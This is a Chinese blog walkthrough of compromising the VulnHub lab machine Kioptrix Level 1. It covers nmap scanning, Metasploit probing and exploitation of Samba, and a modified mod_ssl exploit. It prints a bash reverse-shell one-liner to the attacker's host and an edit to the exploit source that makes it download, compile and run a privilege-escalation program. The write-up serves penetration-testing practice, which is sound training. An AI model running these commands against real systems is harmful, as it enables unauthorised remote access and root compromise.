vulnhub 靶机 Kioptrix Level 1渗透笔记

靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

kali ip

在这里插入图片描述

信息收集

先使用nmap收集目标的ip地址

nmap -sP 192.168.101.0/24

在这里插入图片描述

扫描开放端口

nmap -A -p- 192.168.101.20

在这里插入图片描述

这时我们发现samba的绑定服务器的139端口我们使用msf探测一下他的版本

msfconsole
msf6 > use auxiliary/scanner/smb/smb_version                                                                msf6 auxiliary(scanner/smb/smb_version) > show options 

在这里插入图片描述

msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.101.20
rhosts => 192.168.101.20
msf6 auxiliary(scanner/smb/smb_version) > run

在这里插入图片描述

得到版本信息

漏洞利用

使用msf搜索samba

在这里插入图片描述

使用这个

在这里插入图片描述

注意一下可以使用的版本为Samba 2.2.x - Bruteforce所以可以使用

在这里插入图片描述

设置完成参数run

在这里插入图片描述

成功rce

反弹shell

kali监听1234端口

在这里插入图片描述

反弹shell内容如下

bash -i >& /dev/tcp/192.168.101.21/1234 0>&1

在这里插入图片描述

反弹成功

第二种漏洞利用(这种方法我没有获得root权限)

在一开始信息收集的时候我们注意到mod_ssl的版本为2.8.4,我们使用searchsploit搜索相关漏洞

在这里插入图片描述

我们发现只要mod_ssl版本低于2.8.7即可使用,我们将exp复制出来

在这里插入图片描述

对文件做如下修改

1、在25,26行加入头文件<openssl/rc4.h>和<openssl/md5.h>

在这里插入图片描述

2、第666行url改为

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"

在这里插入图片描述

3、第964行,修改为const unsigned char * p, * end;

在这里插入图片描述

要运行该程序还需要装一下libssl1.0-dev,否则无法编译

apt-get install libssl1.0-dev
gcc 764.c -o exp -lcrypto
提权

执行完程序即可

./exp 0x6b 192.168.101.20

在这里插入图片描述

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值